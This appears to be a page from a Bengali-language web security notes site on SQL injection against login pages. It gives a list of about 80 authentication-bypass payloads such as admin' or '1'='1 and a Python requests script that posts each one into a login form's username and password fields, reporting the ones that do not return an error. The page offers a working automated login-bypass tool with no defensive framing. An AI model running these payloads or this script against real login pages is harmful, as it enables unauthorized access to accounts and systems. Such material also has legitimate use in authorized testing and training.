Web Application Security

⌘K
  2. Home
  4. Web Application Security
  6. Sql Injection
  8. Login Page

Login Page

আমার একটি sql payload লিস্ট আছে আমি একটি একটি করে চেক দেখতে পারি কোন কোড দ্বারা লগইন পেজ break করে ঢুকা যাচ্ছে কিনা কিন্তু একটি একটি করে করা অনেক সময় সদ্য এই কাজ আমরা পাইথন দিয়ে করবো।

Install the requests library if you haven’t already:

pip install requests

Directory Setup

  1. Payload file: Create a text file (payloads.txt) with each payload on a new line.
  2. Python script: Create a Python script (url_sql_injection_tester.py).

Payloads Text File (payloads.txt)

Place your SQL injection payloads in this file:

admin' -- //
' or 1 -- //
suresh' -- //
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

import requests

# URL of the login page
url = 'http://example.com/login'

# Headers for the POST request
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

# Function to test payloads
def test_payloads(payload_file):
    with open(payload_file, 'r') as file:
        payloads = file.readlines()
    
    for payload in payloads:
        payload = payload.strip()
        
        # Test the payload in the username field
        data = {
            'username': payload,
            'password': 'password'
        }
        response = requests.post(url, headers=headers, data=data)
        if 'error' not in response.text.lower() and response.status_code == 200:
            print(f"[+] Successful payload in username field: {payload}")
        
        # Test the payload in the password field
        data = {
            'username': 'admin',
            'password': payload
        }
        response = requests.post(url, headers=headers, data=data)
        if 'error' not in response.text.lower() and response.status_code == 200:
            print(f"[+] Successful payload in password field: {payload}")

if __name__ == "__main__":
    payload_file = 'payloads.txt'
    test_payloads(payload_file)


                        


                        
                        

                                                    




    

        
How can we help?